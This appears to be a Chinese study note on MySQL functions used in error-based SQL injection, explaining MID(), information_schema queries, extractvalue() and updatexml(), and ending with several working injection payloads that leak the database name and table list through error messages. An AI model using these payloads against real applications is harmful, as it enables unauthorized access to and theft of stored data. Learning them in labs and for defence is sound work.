mid(): SELECT MID(column_name,start[,length]) FROM table_name;
| column_name | 必需。要提取字符的字段。 |
|---|---|
| start | 必需。规定开始位置(起始值是 1)。 |
| length | 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。 |
mid(‘abcdefghijkl’,1,4) ==>abcd
mysql查询数据库:
select schema_name from information_schema.schemata;等价于show databases;
=等同于like;
extractvalue()
extractvalue(目标xml文档,xml路径)
函数的第二个参数是可以进行操作的地方,xml文件中查询使用的是/xx/xx/的格式,如果我们写成其他的格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法格式的内容就是我们想要查询的内容。
如果是正常的格式,即查询不到也不会报错,下面进行测试
extractvalue() :对XML文档进行查询的函数
其实就是相当于我们熟悉的HTML文件中用
标签查找元素一样
updatexml()
updatexml(目标xml文档,xml路径,更新的内容)
和extractvalue()相同的是都是对第二个参数进行操作的,通过构造非法格式的查询语句,来使其返回错误的信息,并将其更新出来。
updatexml()函数与extractvalue()类似,是更新xml文档的函数。
语法updatexml(目标xml文档,xml路径,更新的内容)
- admin’ and extractvalue(1,concat(0x5c,(select database())))#
- admin’ and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=’security’)))#
- updatexml:
- 1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
若有收获,就点个赞吧
0 人点赞
